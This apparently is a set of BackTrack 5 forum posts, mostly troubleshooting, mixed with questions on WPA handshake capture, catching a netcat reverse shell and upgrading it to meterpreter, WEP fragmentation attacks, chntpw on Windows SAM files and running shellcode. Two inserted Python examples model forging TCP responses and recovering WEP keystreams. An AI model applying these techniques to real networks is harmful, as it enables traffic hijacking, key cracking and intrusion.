Finally, the access point has to have a client connected, because during the process of capturing a handshake the client is de-authenticated, allowing the handshake to be recaptured.

I know there are many ways of doing this and I know that I only used a low number of passwords in the list, but this is just to give people an intro to using pyrit and what it can do!
Any suggestions and tips will be greatly appreciated.

Has anyone managed to get a NATIVE install of BackTrack or any other Linux distro on an Android-powered phone? Not the chroot+VNC method, that's too easy. I have a mild understanding of Linux internals; how could I use the kernel source from my Android phone (Epic) and compile a BT-compatible kernel?

I have the AR5007EG wireless card and I have spent nights looking at drivers, madwifi, ndiswrapper and so on...
My problem is that on my laptop in Windows you need Fujitsu Launch Manager (.exe) to start the wireless; there is no other way. Has anybody found a way?
Yes, I have tried WINE.

I have a little issue and I hope to find a solution with your help. So please find below where the problem is coming from:
1. I have a Windows XP box behind a router;
2. A netcat application connects from the Windows box to a BackTrack 5 box (having an external IP) via the Internet;
3. I receive that connection using Armitage (Listeners --> Reverse (wait for) --> shell) and I get a shell.
Everything is OK so far, but now I would like to obtain a meterpreter connection and I don't know how to do this (I mention that using Armitage (Listeners --> Reverse (wait for) --> meterpreter) is not working; I mean that nothing happens after I start the netcat connection on the Windows box).
This is my problem and I want to let you know that I remain grateful for any reply.

Installed BT5 KDE 32 on a Dell Inspiron 1525 hard drive. I go to Backtrack/Exploitation/Social Engineering tools/Social Engineering toolkit/Set. I update it. When I go to run it again I get this error:

I'm new to Linux. I used BT4 on my Compaq C500, then got a new laptop (Compaq Presario CQ56) and dual booted with BT5 and Windows 7. My wireless works fine with Windows, but when I go into BT5 my card isn't even detected. I did some research and my card maker makes Linux drivers, woot woot (Ralink RT5390 802.11b/g/n), so now my only problem is installing it. I have no idea what to do. Can I hook it up to a LAN with ethernet and do an apt-get update, or do I have to do it manually with the makefile?

I recently downloaded BT5-GNOME-64.iso and installed it as a VM. I am able to install it via the install script on the desktop. I then configure everything the way that I want it (I reboot several times during the configuration), but if I do an apt-get update, when I reboot the VM, upon boot up I get a purple screen that pops up and says "Ubuntu 10.04" with scrolling dots below it, and then it gives an ALERT! error and drops into a command prompt. I did some research and everything I have read says I need to mount the proper file system to boot up. When I do an "fdisk -l" I get the error "command not found". I am not able to do any other commands either. I am wondering if anyone else has seen this? And if so, what they have been able to do to fix it. Thank you in advance for the views and replies.

Hey guys, I'm sure that most of you have heard of the WiFi Pineapple.
If you haven't, it's pretty much a router that takes advantage of devices that send out probes for remembered wifi networks.... the router responds to the probes, so the device thinks that it's the actual remembered wifi network from home, work or wherever.

What I am keen on understanding is exactly how that works. When you remember a wifi network on your device, you tend to have encryption enabled such as WPA etc. How does that authentication work?

A is communicating via HTTP to B with some GET request.
After some time
A requests a specific web page
[Mark]
B answers with the page

My need is that at [Mark] I inject a packet, sending machine A the page that I want.
Of course B will send the packet as well, but latency is on my side, because I'm on the same machine (or LAN) as A,
so B's real packet will be rejected.
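The race described in the post above only works if the injected segment carries exactly the sequence and acknowledgement numbers A is waiting for: it is then accepted as in-order data, and B's genuine segment, arriving later with the same sequence number, covers bytes A has already received and is discarded as an old duplicate. The block below is an added example, not code from the post: a pure-Python model (no scapy, no raw sockets, nothing is sent) with a constructed captured GET request. forge_response derives the forged segment's addresses, ports, SEQ and ACK from that request, and Receiver is a deliberately simplified model of A's receive side (in-order data only, no window or reordering) that shows the verdict each segment gets. The IP addresses and port numbers are made up.

```python
from dataclasses import dataclass


@dataclass
class Segment:
    """The fields of a TCP segment that matter for the injection."""
    src: str
    sport: int
    dst: str
    dport: int
    seq: int
    ack: int
    flags: str           # "PA" = PSH+ACK, "FPA" = FIN+PSH+ACK
    payload: bytes = b""


def forge_response(req: Segment, body: bytes, close: bool = True) -> Segment:
    """Build the segment A expects from B right after A sent `req`.

    Addresses and ports are swapped. The forged SEQ is the ACK A advertised
    (the next byte A expects from B); the forged ACK covers every byte A has
    sent so far. With close=True the segment also carries FIN, so A tears the
    connection down and ignores whatever the real server sends afterwards.
    """
    http = (b"HTTP/1.1 200 OK\r\n"
            b"Content-Type: text/html\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n"
            b"Connection: close\r\n\r\n" + body)
    return Segment(src=req.dst, sport=req.dport, dst=req.src, dport=req.sport,
                   seq=req.ack, ack=req.seq + len(req.payload),
                   flags="FPA" if close else "PA", payload=http)


class Receiver:
    """Simplified model of A's receive side: in-order data, no window, no reordering."""

    def __init__(self, rcv_nxt: int):
        self.rcv_nxt = rcv_nxt   # next sequence number A expects from B
        self.data = b""
        self.closed = False

    def deliver(self, seg: Segment) -> str:
        end = seg.seq + len(seg.payload)
        if self.closed:
            return "dropped: connection closed"
        if end <= self.rcv_nxt:
            return "dropped: old duplicate"        # every byte was already received
        if seg.seq > self.rcv_nxt:
            return "held: out of order"
        # seg.seq <= rcv_nxt < end: keep only the bytes not yet seen
        tail = seg.payload[self.rcv_nxt - seg.seq:]
        self.data += tail
        self.rcv_nxt = end
        if "F" in seg.flags:
            self.closed = True
        if len(tail) == len(seg.payload):
            return "accepted"
        return "accepted after trimming %d overlapping bytes" % (len(seg.payload) - len(tail))


def demo(close: bool = True):
    """Constructed exchange: A asks B for /index.html; the attacker on A's LAN answers first."""
    get = b"GET /index.html HTTP/1.1\r\nHost: example.org\r\n\r\n"
    req = Segment("10.0.0.5", 40000, "93.184.216.34", 80,
                  seq=1000, ack=5000, flags="PA", payload=get)
    client = Receiver(rcv_nxt=req.ack)               # A is waiting for byte 5000 from B
    fake = forge_response(req, b"<html>injected</html>", close=close)
    real = Segment("93.184.216.34", 80, "10.0.0.5", 40000,
                   seq=5000, ack=req.seq + len(get), flags="PA",
                   payload=b"HTTP/1.1 200 OK\r\nContent-Length: 20\r\n\r\n<html>genuine</html>")
    first = client.deliver(fake)     # the forged segment wins the race
    second = client.deliver(real)    # the genuine page now looks like stale data
    return first, second, client.data


if __name__ == "__main__":
    print(demo())
    print(demo(close=False))
```

The caveat the model makes visible: the genuine reply is only rejected outright when it is no longer than the forged one or the forged segment closed the connection. If the real page is longer and the stream stays open, TCP trims the overlapping prefix and appends the rest, so the browser sees the injected page followed by the tail of the real one; this is why the forged response should carry FIN (or at least a Content-Length the client honours).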

Was using BackTrack 5 on a hard drive. Made some changes (like adding remastersys!) and did a backup (using remastersys). Replaced my current version of BackTrack 5 on a USB stick.
Boots into a command line with
postgres@postgres$

I used to be root#

What happened?

Tried logging in as root and got

Cannot possibly login as root without user

So, I asked the author of remastersys what's up and he said:

The BackTrack folks must do something different than Ubuntu. When you remaster, you are remastering like Ubuntu and it appears the BackTrack devs do something different.
The Ubuntu live scripts called casper basically disable the root account during live boot.
If you can find out from the BackTrack folks what they have done differently I might be able to do something about it.

Hi, I am new to BackTrack but have been using Linux for some time now. I downloaded an ISO image of BackTrack 5 yesterday; I checked it using the hash check and it was OK. I burnt the ISO image and restarted my laptop, and the CD did not boot. All I see is a black screen with Linux information and a few other things, but the laptop was processing, so I left it for an hour and came back, but it was still there. I pressed the Enter key and it said "kernel image not found"... please help me to solve this problem...

My goal is to fakeauth with my Alfa card to my AP by using a PRGA .xor generated via a fragmentation attack. Yes, I know there are other ways I can inject (e.g. spoof my other client's MAC as my own after deauthing the other client, etc., and fakeauth as that source MAC). I don't want to do that because in a real-life scenario (i.e. a pentest) it could be noticed and a good attacker probably would try to avoid it. Anyway - that aside, I must be missing something stupid here:

First I monitor my AP via airodump-ng with:

Code:
airodump-ng -c 6 --bssid $ap -w wepviaclient wlan0
And see the output with no problem, my PC connected to it, etc. (I'm posting this from a different computer so I can't copy and paste the output right now, and I don't think it's necessary for this because I know it's correct).

The one thing I don't quite understand is the -l and -k switches when generating the .xor (I assume this is just so the AP will pass the packet through, but some clarification there might be the key). Any ideas what I'm doing wrong? I feel like it's something very simple that I'm missing. In the meantime, turning off SKA or generating ARPs as an auth'd client works fine to increase IVs and I have already cracked the key several times. I don't know if this is really relevant to the course or not but I really want to know why this doesn't work.
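The PRGA .xor file the post above is trying to obtain exists because of one property of WEP: the RC4 keystream depends only on IV||key, so every frame sent under a given IV is XORed with the same keystream, and the first bytes of nearly every data frame are a known LLC/SNAP header. XORing captured ciphertext with that header yields a few keystream bytes; those bytes are enough to encrypt a short fragment (payload plus CRC-32 ICV) that the AP accepts under the same IV, and the AP's reassembled, re-encrypted copy of data the attacker chose yields a keystream long enough for full-size packets. The block below is an added example, not code from the post or from the aircrack-ng project: a self-contained Python model of WEP (RC4, ICV, IV in clear) with a constructed 40-bit key and IV, showing keystream recovery from the SNAP header, a forged 4-byte fragment that passes the AP's ICV check, and the longer keystream recovered from the relayed frame. It models why the attack works; it is not a replacement for aireplay-ng or packetforge-ng.

```python
import struct
import zlib

# LLC/SNAP header that starts the body of an ARP frame (an IP frame ends in 08 00 instead):
# this is the known plaintext the attacker relies on.
SNAP_ARP = bytes.fromhex("aaaa030000000806")


def rc4(key: bytes, n: int) -> bytes:
    """RC4: key scheduling, then n bytes of PRGA output (the keystream)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xff
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xff
        j = (j + s[i]) & 0xff
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xff])
    return bytes(out)


def icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xffffffff)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(iv: bytes, key: bytes, plaintext: bytes) -> bytes:
    """Frame body as sent on air: 3-byte IV in clear, then RC4(iv||key) XOR (plaintext||ICV)."""
    data = plaintext + icv(plaintext)
    return iv + xor(data, rc4(iv + key, len(data)))


def wep_decrypt(frame: bytes, key: bytes):
    """What the AP does: strip the IV, decrypt, check the ICV. Returns (icv_ok, plaintext)."""
    iv, body = frame[:3], frame[3:]
    data = xor(body, rc4(iv + key, len(body)))
    plain, tag = data[:-4], data[-4:]
    return tag == icv(plain), plain


# --- attacker side: no key needed ---
def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """Keystream for this frame's IV = ciphertext XOR known plaintext (same length)."""
    return xor(frame[3:3 + len(known_plaintext)], known_plaintext)


def forge_fragment(iv: bytes, keystream: bytes, payload: bytes) -> bytes:
    """Encrypt payload||ICV with the recovered keystream, reusing the same IV.

    With 8 keystream bytes only 4 payload bytes fit, since the ICV needs 4; the
    fragmentation attack sends up to 16 such fragments for the AP to reassemble.
    """
    data = payload + icv(payload)
    if len(data) > len(keystream):
        raise ValueError("need %d keystream bytes, have %d" % (len(data), len(keystream)))
    return iv + xor(data, keystream)


def demo():
    key = bytes.fromhex("0102030405")     # constructed 40-bit WEP key, known only to the AP
    iv = bytes.fromhex("0bad01")          # IV chosen by the victim client, sent in clear
    # 1. A legitimate ARP frame is captured from the air.
    captured = wep_encrypt(iv, key, SNAP_ARP + bytes(28))
    # 2. XOR the first 8 ciphertext bytes with the known SNAP header: 8 bytes of PRGA.
    ks = recover_keystream(captured, SNAP_ARP)
    # 3. Forge a 4-byte fragment under the same IV; the AP's ICV check passes.
    ok, plain = wep_decrypt(forge_fragment(iv, ks, b"frag"), key)
    # 4. The AP relays the reassembled data (which the attacker chose) under a new IV;
    #    the same XOR now yields a keystream long enough for full-size packets.
    new_iv = bytes.fromhex("0bad02")
    reassembled = bytes(range(64))
    relayed = wep_encrypt(new_iv, key, reassembled)
    long_ks = recover_keystream(relayed, reassembled + icv(reassembled))
    return ks == rc4(iv + key, 8), ok, plain, len(long_ks)


if __name__ == "__main__":
    print(demo())
```

Two details matter for real frames and are outside this model: the 4th byte after the IV holds the key index and must be preserved, and 802.11 fragments share one IV only because the sender reuses it, which is exactly the reuse the AP should refuse but WEP does not.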

I'm attempting to install BT5 on a completely wiped and formatted hard drive (netbook). I have two partitions, both formatted ext3. The install goes fine until step 4 (formatting and hard drive options); it just hangs. I tried to install gparted to make sure my partitions were OK but it also crashes when loading. Any ideas where I may be going wrong? I'm using a 4G USB created on a separate computer with Unetbootin... I do not have a CD drive.

Hey all, I recently set up BT5 and Windows 7 as a dual boot on my laptop. It's been working great, but I've had a big annoyance for the past couple of days. Probably every minute, a little notification pops up in the center of my screen telling me the current brightness of my laptop's screen, and then it moves the brightness either up or down, almost randomly. I downloaded the drivers for my video card a couple of days after installing BT5 because of the "black screen" problem. It might have done that before the driver download and I didn't notice, idk.

Anyways, I have an ATI Mobility Radeon HD 5700. Has anyone had the same problem and found a fix for it?

Hello guys. Yesterday I installed BackTrack 5. After 5-10 minutes from boot up, BackTrack freezes. I searched a little and found that it was a problem with the ATI drivers, so I downloaded ATI 11.6 and installed it from the run file. Now some of the effects don't work, such as blur, wobbly windows, fall apart and others. I have a Mobility Radeon 4650 and BackTrack 5 KDE. Does anyone know how to fix this?

I know this is a widely discussed topic: using the acpi=off flag in the boot options to get BT5 to boot properly on many different machines. That is fine; however, once booted, the acpi=off flag makes it so that I cannot use or enable wifi (it needs power management).

Is there a workaround for this issue that still retains the functionality needed with BackTrack? Or am I stuck with a VMed BT5 until we get an R2 version?

I already use the i915.modeset=1 flag to get past the black screen bug; however, the error I receive afterward is a full page of code that starts with

"NULL pointer dereference at (location changes)"

The research I have done says it's a common bug with the build of Ubuntu that BT5 is based on, but I have not found a resolution as of yet.

Hello,
I tried to boot BackTrack 5 GNOME with the live DVD, but it didn't work.
Later, I tried to boot it via USB live with unetbootin; that didn't work either.
I downloaded BackTrack 5 KDE, burned it to another DVD and USB again; it didn't work again.... :(
I will explain what happens:
I have Ubuntu 10.04 LTS installed on my laptop, and when I insert the DVD/USB it shows the boot screen..
I choose the first option, then the BackTrack 5 wallpaper shows, and it logs me into the BackTrack terminal.
I type root and toor, and it logs me in!
But when I type startx, it conflicts with my Ubuntu and logs me into Ubuntu, and the panel is crazy, the wallpaper is the default Ubuntu wallpaper, and there aren't any tools at all....
This happens only on my laptop [i686] with BackTrack 5 GNOME & KDE; my other desktop works perfectly with the DVDs and USBs.

BackTrack 4 R2 boots perfectly on my laptop, but I don't like it for many reasons.

Hello, I am a BackTrack/Linux newbie. I very much love using Linux/BackTrack. When I run Windows, everything looks fine, but when I run Linux (BackTrack 5), my notebook gets very hot, between 70 C and 80 C, even if I'm just using text mode. The one Linux distro that does not make my notebook hot is Pentoo 2009.

Can anyone help me with what I must do to fix this problem? I really would love to use BackTrack.

Hello, just wondering if anyone has successfully installed BackTrack on a Genesi Efika MX Smartbook. I'm thinking about buying one very soon to run it on, but was wondering about it. Please let me know. Cheers.

Hello,
A n00b question.
I'm considering moving to an iPhone. If I do that, I want to have BackTrack available at all times. I heard that was possible but couldn't find any tutorial or information about how to do that.
Can anyone recommend such a tutorial or instruct me how to do that?
Thanks,
Gabriel

I was running BT5 on a live CD on one of my computers. I was experimenting with 'chntpw'. Whenever I would try to run 'chntpw' it would say

Code:
The program 'chntpw' is currently not installed. You can install it by typing: apt-get install chntpw
You will have to enable the component called 'universe'
On running
Code:
apt-get install chntpw
it says
Code:
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded
When I move to
Code:
/pentest/passwords/chntpw
and run
Code:
./chntpw
I can run 'chntpw'. Weird (any ideas for the future on how I can get this program running without actually being in its directory?).

--------

So I mount my Windows drive in a temp folder and navigate to
Code:
Windows/System32/Config
Failing to run 'chntpw', I unfortunately came up with this genius idea to mv the SAM/SYSTEM files to the 'chntpw' directory.

From here I can run ./chntpw. I moved the files back and rebooted.

On a second computer I ran the exact same steps as above except I FORGOT TO MOVE THE SAM/SYSTEM FILES BACK.

I rebooted and now Windows can't find the SAM/SYSTEM files so it is locking me out.

Is there a way to recover a backup version of SAM/SYSTEM?
What's the best way to recover my files (I can see them using a live CD of BT)?

I have successfully installed pyrit, the latest ATI drivers, and AMD-APP-SDK (tested the samples and they pass).

I am now trying to install cpyrit-opencl to make use of my ATI card.

When I go to build setup.py, this is what I get:

Code:
The headers required to build the OpenCL-kernel were not found. Trying to continue anyway...
svn: '.' is not a working copy
running build
running build_ext
Building modules...
building 'cpyrit._cpyrit_opencl' extension
gcc -pthread -fno-strict-aliasing -DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes -fPIC -I/usr/include/python2.6 -c _cpyrit_opencl.c -o build/temp.linux-x86_64-2.6/_cpyrit_opencl.o -DVERSION="0.3.0"
_cpyrit_opencl.c:23:19: error: CL/cl.h: No such file or directory
_cpyrit_opencl.c:46: error: expected specifier-qualifier-list before cl_device_id
_cpyrit_opencl.c:57: error: expected =, ,, ;, asm or __attribute__ before * token
_cpyrit_opencl.c:58: error: expected =, ,, ;, asm or __attribute__ before num_platforms
_cpyrit_opencl.c:63: error: expected ) before error
_cpyrit_opencl.c: In function oclplatf_init:
_cpyrit_opencl.c:122: error: cl_uint undeclared (first use in this function)
_cpyrit_opencl.c:122: error: (Each undeclared identifier is reported only once
_cpyrit_opencl.c:122: error: for each function it appears in.)
_cpyrit_opencl.c:122: error: expected ; before num_devices
_cpyrit_opencl.c:123: error: cl_int undeclared (first use in this function)
_cpyrit_opencl.c:123: error: expected ; before err
_cpyrit_opencl.c:130: error: num_platforms undeclared (first use in this function)
..... many more similar errors
I fear that although working, I may have installed either my ATI drivers or the ATI APP SDK wrong, or in the wrong place.

I admit I am probably testing my limits since I am fairly new to linux.

I've searched and the only thing that seemed to relate to my problem was someone saying that GCC was a different version than the ATI driver used, but that didn't really make sense to me. Any ideas? If more info is needed let me know and I will gladly provide it. Thanks in advance.

I have installed the above and was wondering the following, as I have no disk space left without really doing anything.

1 - Does BT boot from the first partition, which is 2.5G?
2 - What files are loaded on partition two, which is 5.5G in my case?
3 - When installing or updating BT, where do the files write to, partition 1 or 2?

Partition 2 is totally full and I guess I'm wondering if I can safely delete any files to free up space.
I know this may be a basic question to experienced users but any guidance is welcome.

So, I've repeatedly installed BT5 in VMware, but whenever I do, the system monitor always says that there are 0 bytes of hard disk available, and I always run out of memory after 500 MB. Do I need to manually mount the HD or allocate a partition for VMware to use?

I am wondering how to install the VMware Fusion Tools I am running on my MBP for BackTrack 5? Every post I read says that after selecting install tools, the media disk that mounts is titled VMware Tools, but on mine it is titled BT5, and when I go looking in its contents there is nothing showing that matches up with the walkthroughs that I see online. Can anyone help?

I'm using the wireless network manager under the Internet tab in the applications menu. I have successfully cracked a WEP. However, when I try to connect I get past validating the passphrase, but I then get an error: Can't connect to IP. Like I said, I can crack the WEP key so I don't think it's a driver issue (I could be wrong, I am absolutely new to *nix). I'm dual booting with Ubuntu and can connect just fine to the same access point with the key.

Though not strictly a 'backtrack' question, I was wondering if anyone remembered the convoluted batch command from the old version of Metasploit Unleashed that would recursively uninstall all of the patches on the FDCC image?

Hey everybody. Okay. So I'm pretty good with computers, but I am completely new and a beginner when it comes to BackTrack, Linux, and everything to do with it. Like I can't get VLC to work, don't know how to download and install stuff... just totally new. Ha. I have a default wireless card in my laptop, but just bought an AWUS036H to use instead. I know it's set as wlan1 or whatever by running airmon-ng. However, I'm trying to figure out how to set it as my default card so that it shows up in Wicd manager. Right now I'm pretty sure it's still using my first wireless card, since I should have more networks popping up and stronger signals. So I need to know exactly what to do in order to use this card and set it as my default so that it is used in the Wicd manager to search for and connect to networks.

I have Windows 7 installed, but I'm running BackTrack 5 as my OS (not using VMware or anything). Thanks in advance...

In the first menu I chose the option "Backtrack Forensics - No drive or swap mount", and after a few seconds a terminal full of text appears on the screen, but I can't type. This page stays on the screen until I restart my PC. What can I do?
Apologies for my bad English.

Hi all... I have created a shell script that lets me run my wireless card in monitor mode... my question is... how can I stop the terminal from auto-exiting? Because I want to see the echo messages that I put into the script... but when I run the script the terminal does the job without letting me see the echo messages... THANKS!!! =)

Hi,
I'm running BT5 GNOME on an encrypted USB. I have tried EVERYTHING to change the bootsplash with no luck. Even utilities like ubuntu-tweak don't work. I suspect it could have to do with the bootsplash being on the smaller 500 MB partition used for booting. To update my grub list I had to make the changes and run update-grub on my primary partition and then copy the grub.cfg to my boot partition. Any ideas?

I am brand new to the world of BackTrack and am in need of an answer to a seemingly easy problem! I installed the GNOME 64-bit version of BT5 on my laptop and everything seems to be working.

I am trying to log in to my school's public wireless network. Typically I would try to connect and Windows 7 would then say limited connection etc. And I would accept some terms and then log in with a username and password. With BT5 I try to connect to a network and it tries to get an IP, but I don't know how to log in to the network to receive that address.

Then you set the value of e.g. "command_1" to the command you want to run, which is "gnome-terminal" (without quotation marks).

Now we need to find out the hardware name of our WIN key. Mine is "Super_L". I don't know if it's the same on every PC/laptop. To find out, run "xev" from a terminal and hit the WIN key. If you don't know what to look for, hit the left Ctrl key. If you look at the output that appears you will see "CTRL_L" somewhere in there. When you press the WIN key, look at that exact place to find out the hardware name of your WIN key.

Remember this name.

Now in gconf-editor navigate to "apps/metacity/global_keybindings" and select "run_command_1"; edit the value and enter the name of the key (in my case "Super_L").

I just wanted to know how to execute shellcode in Python/Perl like I do in C using
Code:
/* shellcode[] holds the raw payload bytes and must live in executable memory
   (compile with -z execstack, or copy it into an mmap'ed RWX page) for this
   cast-and-call to work on a system with NX enabled. */
int main(void)
{
((void (*)(void)) shellcode)();
return 0;
}
I created linux/x86/meterpreter/bind_tcp shellcode with MSF, which means there are 2 stages.
I don't know how to load and execute these two stages in order to run a Python/Perl script like a compiled C shellcode.

I had the 32-bit version of BT5 installed and it seemed to be working quite well. I decided I wanted to install an SSD in my system. The cloning process went terribly wrong, something to do with copying grub over. Needless to say, I had to do a fresh install of both Windows 7 and BT. I decided that this time around I would try out 64-bit BT. I have not really seen any speed boosts but have noticed some quirkiness in the way some of the programs run now. The Gerix wifi cracker GUI worked fine on 32-bit but it seems that some of the underlying code is broken in 64-bit. There was a pipe error when trying to auto-populate the MAC and I have not been able to get a "cracked" hex password to work in testing. But this is only one example. I have also seen what appears to be a bit of a slowdown on loading at boot. I am about to move BT off of my HDD and onto a partition on the SSD but am looking for advice on which version to use now. 64-bit or 32-bit?

Yes, I know the net and this site are full of instructions on using unetbootin, usbinstall, linuxliveinstall and yumi to install a BT5 image to a USB stick. In general, these methods copy a squashfs image and a couple of other files. The 'install' doesn't look anything like a normal Linux install with the usual directories (var, etc, bin, sbin...). Why is this? Is the BT5 live install basically an image that gets loaded into RAM? Is this for security or for the longevity of the USB?

If someone has BT5 on a live CD, what's wrong with using the 'install backtrack' shortcut that's on the desktop to install to a USB?

But this is for repackaging a modified but not installed Ubuntu live CD.
Instructions for repackaging BT4 are here: http://www.offensive-security.com/ba...e-tutorial.pdf
but the link mentioned in there does not work. And the reference to remastersys is generic but not instructive.

Is there any FAQ on repackaging BT5 that I may have missed in my searches?

hello guys
my new (horrible) video comes from reading a wonderful, interesting, amazing BLOG. I changed ONLY the "Scenario" (even more so because my head would not be able to do anything else!); all the credit goes to him! Many thanks for your work. Many, many thanks to a "BIG" g0tm1lk
ps (sorry for the quality but my old PC + old nvidia is dying...)... my career as a "video director" is ending so maybe it's better!!! :):):) muahahahaha!
if you want to watch: http://vimeo.com/25605168

Guys, I can't seem to get BT5 to install to my drives. I'm running Win7 x64 (which will hold the boot manager) on a 60 GB SSD, then my games are on 2x 1 TB Caviar Blacks in RAID; and I have a 1 TB Black that I want to update to BT5 (it had 4 on it, but I reformatted and started to use it for storage, but eff that).

I get an error message when using the installer on the live CD desktop.

Also, it's semi-unrelated, but I was getting the startx error; the remove-themes fix works, but it seems that I still have to install the newest ATI drivers via the command line (ATI 5970 Black Edition) to get anything going.

Also, I had to burn a DVD; for some reason I couldn't get BT5 x64 working on an 8 GB thumbstick, but I was able to use it a few days ago for my netbook's x32 install.
Also, I get a good 30 seconds of error messages when the live CD is first starting. The most I've been able to read is something about ATI, so I'm assuming the drivers on the live CD are bad. And yes, I am MD5 matched. It does the same with both distros.

Any help at all would be super appreciated. My Alfa is begging to be used again :(

I have been trying to get BT5 installed on my Dell Inspiron 1564 - but have had a number of problems. I have used previous versions of BT for several years, but I am not a Linux expert.... I rely heavily on these forums for fixes.

I have tried both BT5 64-bit GNOME and BT5 64-bit KDE. I can get both installed, but with GNOME my sound doesn't work. So right now I am using KDE.

When I first got it installed, I had a problem with startx not working, which was documented on these forums... and I successfully used the fixes to solve that problem.

I have 2 current problems. First, I am having big problems with my built-in wireless - it is a Dell Wireless 1397 mini-card rev 5 (BCM4315 based). First of all, it won't stay connected to my AP - it drops the connection repeatedly. And second, for some reason it isn't automatically getting configured with the DNS servers I use. When I use a wired connection, it picks up which DNS servers I use. I also have an Alfa AWUS036H and it works fine.... it doesn't drop its connection with my access point, and when I connect it to my AP, it gets set up with my DNS servers.

The second big problem that I have been having has to do with crashes/hangs. They seem to happen when I am using the touchpad (Alps). I am at a different computer now so I can't post any logs.... but I will do that later.

I think I will attempt to try BT5 GNOME 64-bit again and see if I have any luck with it - I don't recall it crashing every few minutes. However, the Broadcom issues were present in that version as well.

Even though I have been experimenting with BT since BT3, I'm still a bit of a BT noob, but I hope someone can help me with my problem.

I've decided to install BT5 in Parallels (on a Mac) as a virtual machine, since triple booting is a bit of a pain and I cannot give up my Windows partition (I need that one for work ;)). After setting everything up and installing some drivers, everything worked fine, until I decided to install the Parallels Tools (since the newest version supports Ubuntu 11.04 systems). Since then some settings seem to deactivate themselves regularly. These include:

- Desktop animations (they are deactivated immediately upon restarting them...)
- The size of the (manually maximized) panel returns to half the screen's size after every reboot
- The boot screen is now at an 800x600 resolution

I tried fixing the problems by "reinstalling" my backed-up xorg.conf file, but as soon as I do that, the Parallels Tools don't work anymore (they created a new xorg.conf file and overwrote the old one).

Is there no way to get things working fine again AND keep the Parallels Tools? (All my experiments with the xorg.conf file haven't worked so far... even mashing up the Parallels-created settings and the old ones doesn't seem to work.)

Or do you recommend running BT5 (persistent) on a USB stick rather than as a virtual machine?

Thanks in advance for your help, and to every Parallels user willing to share his secret on how to run BT5 smoother ;)

I have been writing an aircrack suite script to streamline most tasks and have been extensively testing it when I noticed a typo in aireplay-ng Chop Chop no client packet forge.
The odd thing is that it still works despite the typo; it still creates an XOR file, then a packet which when injected generates hundreds of IVs per second.

The typo is:

aireplay-ng -4 -h 11:11:11:11:11:11 -h 44:44:44:44:44:44 wlan1

The MAC with the 1's was the AP and the MAC with the 4's was the fake authed client, which was the MAC of my interface.

The typo was in this order where the first -h should have been a -b for the AP, funnier still is that with the typo chop chop worked faster at about 1/4 the time of the correct syntax.

I have a question and I almost definitely know the answer, but I figure it couldn't hurt to ask, so here goes:
Is it possible to install BackTrack 5 onto a Samsung Tocco Lite?
The Samsung Tocco Lite is not an Android phone, but I am hoping there is a way!

Whenever I try and boot BT5 from my live CD, the picture is nastily squashed to the right hand side of the screen with the bottom of the picture completely off the screen. Here's a picture of what I mean. This only happens when I'm presented with the terminal or when I've run startx. The initial splash screen displays perfectly.

I tried using xrandr to make a custom resolution, but got stuck with an error explaining my monitor's max resolution is 720x576 - which it definitely isn't. I found some guides saying I need to tinker with xorg.conf - but that file doesn't even exist for me.

I'm trying to install BT5 on a partitioned hard drive; but the installer can't be resized enough for me to see all the options... I'm not comfortable with partitioning blind.

Does anyone have any suggestions? I've been Googling round for about a day now, to no avail. The graphics card is a Nvidia GeForce Go 7150M.

Hi,
I am doing some research on password lists for a security tutorial. I have been looking at the psychology of passwords for quite a while now. What came to my attention lately is the idea to automatically create a passphrase list from a huge text file, an ebook for example. To be clear, let's take an example. I need a little Ruby magic or shell magic which does THIS: I want to input a text file and want the script to output the list of the passphrases from within this text. When a "." appears it should include the dot in the current passphrase, do a CR and let the next passphrase begin. Example:

Text Input Textfile:
The quick brown fox jumps over the lazy dog. Always look on the bright side of life. Hello World. Blablabla. This is a test.

Now the output file must look like this:
Tqbfjotld.
Alotbsol.
HW.
B.
Tiat.

I guess that is pretty easy - but as I am not quite familiar with that stuff - can anyone please take five minutes to figure that out? It would be highly appreciated.

When this boots up, I get an error message "unknown video mode 317". I select mode 315 from the list and continue to boot up.
This is because the screen has an odd resolution of 1024x600. I had to run BackTrack 3 in 800x600 mode, but BackTrack 5 works correctly in 1024x600.

WIFI

I ran the following commands to test RFMON/injection:

killall -9 dhclient3
airmon-ng start wlan0
aireplay-ng -9 mon0

I got an "Injection is working!" confirmation.

The adapter is a mini Ralink 2860. Airmon-ng reports that it's the "rt2800pci" driver that is being used for it.

BATTERY

Battery seems to be reported correctly (also a problem on previous versions).

BOOT FROM SD

I boot from the SD card using a 4gig SDHC card. It appears to work well.

I am new to BackTrack and have been setting it up over the last couple of days. I am running it on an HP dv6t laptop and everything is working except for my wifi. I have tried connecting to my home network (WEP encryption) using Wicd. It appears to be working but then Wicd says "Connection failed: Unable to get IP address".

I have read some other threads and at least one other person had this same problem, but no one knew a fix. Some said it was a problem with dhclient.

I have an Alfa AWUS036H adapter and neither the Alfa nor my laptop's internal wifi card would connect. The Ethernet (eth0) connection works perfectly with my router and obtains an IP just fine. I have never had a problem connecting to my router with wifi in Windows.

I hope there is a simple fix for this. Please clearly explain what I need to do or if I need to provide more info because I am relatively new to Linux.

Hi, I'm fairly new to Linux, just got BT5, OSX and Windows triple boot :) However... I'm having problems installing BeEF; it's preinstalled in BT3 and works like a charm... Not sure why it's not in BT5 :confused: ?

I have installed it via apt-get and through the software manager; however it doesn't appear under services, nor can I find out how to run it?

Let me introduce myself first:
Even though I was always interested in networking, security, encryption and the like, I never really got to dive too deep into those matters.
So I downloaded backtrack5 and first used it as a boot disk, shortly after that installed it on a VMWare machine.

So here is my Problem:
For starters I wanted to do something easy and decided that WEP cracking sounds fun.
I built up the following setup:
Netgear Router with WEP40 and MAC-Filter, my Netbook that is connected to this router.
I put a USB-WLAN-Stick (able to do promiscuous mode) into my desktop PC and started backtrack.

